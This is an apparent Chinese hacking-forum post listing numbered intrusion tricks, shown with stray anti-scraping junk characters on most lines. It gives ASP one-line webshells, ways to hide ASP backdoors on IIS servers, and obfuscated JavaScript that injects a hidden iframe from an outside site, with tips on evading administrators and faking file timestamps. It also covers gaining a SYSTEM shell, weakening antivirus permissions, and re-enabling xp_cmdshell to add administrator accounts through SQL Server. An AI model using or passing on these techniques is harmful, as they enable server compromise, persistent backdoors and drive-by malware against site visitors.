! @. ~$ v% V9 l# d& m3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!9 V' T# Y% C, K8 X

  }7 n4 {$ Q* E: ~* [( x51、log备份时的一句话木马:- o, T6 C5 [) ~4 j7 g0 V
a).<%%25Execute(request("go"))%%25>5 P+ _$ j+ n" N% C1 D
b).<%Execute(request("go"))%>
& D9 h( `$ f# J9 p# Cc).%><%execute request("go")%><%
2 |. A0 A9 r* A; M0 H  z" E( bd).<script language=VBScript runat=server>execute request("sb")</Script>% F9 r! P! ^4 ?( w6 f4 V
e).<%25Execute(request("l"))%25>2 D9 H3 p* N. S0 l0 W3 G
f).<%if request("cmd")<>"" then execute request("pass")%>
0 B* `. \% ~" \8 o/ x6 R- j7 r% T
$ Z, D+ }$ @6 q52、at "12:17" /interactive cmd
! ]) y* G. t* o' x执行后可以用AT命令查看新加的任务
0 d& q& Y* n7 l9 ?' d% k用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
% L9 X2 Y$ y4 J$ |( I' W( d  Z$ H9 T( ~6 v# ~: C. ^
53、隐藏ASP后门的两种方法
# j1 {! P5 h8 [6 g1、建立非标准目录:mkdir images..\* T5 K0 q4 Y! H, |2 ^2 K( e
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
9 z: ]6 e6 o1 u  }8 W通过web访问ASP木马:http://ip/images../news.asp?action=login
. _& E' z& [4 t: q如何删除非标准目录:rmdir images..\ /s( A. x( \- C' N
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
2 H8 l0 h6 c# [8 `mkdir programme.asp
1 ]1 R4 F# [2 [% ?: i  H5 D/ b新建1.txt文件内容:<!--#include file=”12.jpg”-->
/ |/ q0 x2 G, ?) _+ |. I" i新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件  I/ V" U# }. j( Y( _
attrib +H +S programme.asp4 o! L# F$ |1 u$ z3 `
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt( d# }% A2 a& {, E

0 ?% |, p6 B% R3 s/ u54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! H' X9 X- {& x3 w
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
; z/ z- ~3 u* k' \# B5 K( ^, `, ?4 v9 b
55、JS隐蔽挂马9 E8 z# [& t1 X& o4 l
1.
% y7 m; ]( }* r, s( J3 H' Ovar tr4c3="<iframe src=ht";, H$ n" o- V. k( R; B! U" m, S0 D
tr4c3 = tr4c3+"tp:/";9 N  ~. p  |2 b$ R
tr4c3 = tr4c3+"/ww";6 t% [5 m/ u" c. N$ Q+ |: F
tr4c3 = tr4c3+"w.tr4";5 E& v, F; w# f1 C( n0 K  P, [, ~
tr4c3 = tr4c3+"c3.com/inc/m";
  C: D: [  s- a* Z2 ^( V& K% `tr4c3 = tr4c3+"m.htm style="display:none"></i";7 Z5 }9 u5 X% V- V9 s
tr4c3 =tr4c3+"frame>'";2 |- s2 D! i) m0 v1 U8 W
document.write(tr4c3);! T3 C' K& F- _3 g0 q' m
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 D4 F4 z( A1 w  E, z& N' B
: b) k7 R* }( U% ^2 d, N. W2.6 J# `5 j8 k! B3 z
转换进制,然后用EVAL执行。如3 s) Y: v& h; w7 s" K9 H
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");: @/ W" I: o& C' g" {! D
不过这个有点显眼。
: q1 ]+ S( t; t; [3.
' X( _8 ~! C# }4 Sdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
; V1 k! n1 _' x, L最后一点,别忘了把文件的时间也修改下。# T5 U) i( \" t+ o+ v! |. F& S* s

7 v8 j4 f- z2 A+ l; z6 W56.3389终端入侵常用DOS命令  l  l, _9 a0 C6 ?* S& y
taskkill taskkill /PID 1248 /t# k6 [# c0 L5 P$ [9 s* S3 u
( E7 H) ]8 \  V) a
tasklist 查进程
( m' Z7 h1 Z* g/ Y
9 ?3 E6 |% p9 g2 S8 T! Wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
& Y$ i( I& P7 a& n4 N) c' K+ ~iisreset /reboot
5 G" i/ X; R$ R* q- s" s- I$ Mtsshutdn /reboot /delay:1    重起服务器( d& ~$ \: C( \$ g

, D7 s& T/ f& A2 ^9 clogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
4 X& o) e5 n: X+ |% V5 \
( d- B! z3 }( m% d" E2 N" I/ C6 Hquery user 查看当前终端用户在线情况' r9 F5 T1 E! G1 f
- {$ Q, v6 w, X$ f8 A/ e
要显示有关所有会话使用的进程的信息,请键入:query process *; y# l' F2 L  ^! L7 }% B) y4 c

4 x- R$ p0 g2 B/ j% r' }要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:29 }5 n0 y: s/ C6 I6 g/ C' L3 {

; A( I7 L. Y3 T: ^! A( X- q$ t要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2' B* M3 H' t3 d1 {3 b' v

- Q; j4 X+ u6 w( @2 S4 d. Q要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
: ?/ x" i" @" A' d
: b/ ?/ {& ?2 v/ B, P命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启5 h2 H7 p( x6 S3 W, [" w% _* Q

2 f7 u( a0 S3 j3 ^, B, Y6 e命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统4 |7 g! S  Q/ j3 N8 d/ ~3 d' n" [" ]

+ O( i: d& a5 B" Z" n命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; o/ l& Y9 l9 N! i
4 \( X& k1 H% @% j( o4 w命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机5 Z0 E) h- K, e3 Z3 v

( U, N  ]% h% J8 F: I; _3 \& `56、在地址栏或按Ctrl+O,输入:7 X. m, j6 T4 d! B; U
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;' Y5 v  E, y9 T) |
. U  ^+ z. \' E* C6 @# @
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。7 R" b- u0 C& [% X% J; B
/ h) v2 j/ {& t4 ^, C# @
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,3 U3 i6 T6 c% Y/ V2 C
用net localgroup administrators是可以看到管理组下,加了$的用户的。4 o: [, S% i  _2 s7 A' [

( S% X# t/ D' @& n1 Z$ e% j58、 sa弱口令相关命令
' Y6 D. p, D# d! I8 }
* O) X* V. X: k: w) |! P1 N一.更改sa口令方法:
. l) F' h" M- [! L% F9 X6 Q$ N用sql综合利用工具连接后,执行命令:: t* [, R4 s/ q7 F
exec sp_password NULL,'20001001','sa'7 S% d) C* @5 K6 i' d0 }
(提示:慎用!)& c, Z. m. I8 |4 D+ z" D

+ S$ H1 {2 o. C  X' P* n/ H二.简单修补sa弱口令.
+ r. r/ ?' q0 b& B/ v! [3 D; z+ J4 O" r: |& B/ z
方法1:查询分离器连接后执行:
$ L' ^0 X1 O! j( o( K0 w9 C& Qif exists (select * from6 \4 o3 ?" }( g+ i8 ?2 j8 G8 F% y
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- ^+ Y& m5 j" w3 _, i
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
3 m4 B; |; x! c0 q+ J8 B5 G: o
, o. E2 U3 H" Y( gexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
( r9 z8 L  _1 V+ S4 k) d& v% u2 k* g) p" U) G/ W* L: d
GO
/ g1 Y# o" `0 s; w$ O1 I9 J
4 f; g) b% V/ _9 {5 W然后按F5键命令执行完毕
& }$ l4 X/ ]4 Q" b! ]- @# s9 v/ j, N# U/ |+ I9 X1 d8 l1 _
方法2:查询分离器连接后
% C; X) E& J0 z2 C4 F2 c- S第一步执行:use master  x$ }0 h$ ]7 S  q' S% l& B3 ?
第二步执行:sp_dropextendedproc 'xp_cmdshell'+ o4 i+ x1 T; @1 T7 d. _
然后按F5键命令执行完毕6 J9 N$ v( X0 @5 c! \7 Y$ U+ @$ l; b

: J. h" `9 a& P: ~0 Y; _! j! u; {0 o
三.常见情况恢复执行xp_cmdshell.
# Z2 g5 B% D+ B, m! {5 l) Y
5 k# M- [  ~, I; h& ~/ @3 l
  |2 i6 Q" }) V. j! y$ x- b6 a* n1 未能找到存储过程'master..xpcmdshell'." k& t) C5 J: E7 V
   恢复方法:查询分离器连接后,
' s2 l8 J/ r( W第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int( l3 _1 m: ^+ r$ ]$ n8 H- m& X
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 g5 |/ k3 M7 z) [$ e然后按F5键命令执行完毕( y2 t; n- N! ?+ E! m4 Q
1 J( t8 t1 H% Q/ v! {9 L. d3 Z
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
& @1 G1 [7 [' P6 B; y" U' F恢复方法:查询分离器连接后,
: I1 q' r3 P: k' c第一步执行:sp_dropextendedproc "xp_cmdshell"0 A7 ?" H% R& X
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( m* H$ R) e' z# p
然后按F5键命令执行完毕
) n2 r! ^' M+ `) o8 ?: v  y6 h* P$ \& U( H7 X( ?( K2 y
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( y9 h2 a( S- r" X7 q
恢复方法:查询分离器连接后,
! @, J: B, b2 o) a3 p' s第一步执行:exec sp_dropextendedproc 'xp_cmdshell'7 ^$ D  H. J1 l5 W; D) R! R
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
- {7 P# Z8 L; W( a4 e% R然后按F5键命令执行完毕
+ N% j! h9 e# E5 {5 [8 k- w1 G3 x: `& X* X( e" p
四.终极方法.7 y8 V8 _5 l/ G- y# v( P" `. ]
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
. w4 B2 |# @5 D) U5 m8 J查询分离器连接后,. K$ Q  ?+ O: M' t/ v: c# n
2000servser系统:, F" i$ M; C9 O: a# G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'7 Q! S' @7 y/ L4 C

0 ]! W4 Z9 Z& @& B" \$ `9 Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 T, [! d/ w6 T* o, L2 a* k1 C
7 t4 I. T6 E; C/ A$ s' G3 _xp或2003server系统:
0 y! F- T7 }5 S8 p0 @9 h& ~, P3 f9 X4 `% @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'; V0 c. a1 n* D

5 L, I' k- c2 w% F% d. B9 Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 k1 e+ I/ g) r1 B( p! }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表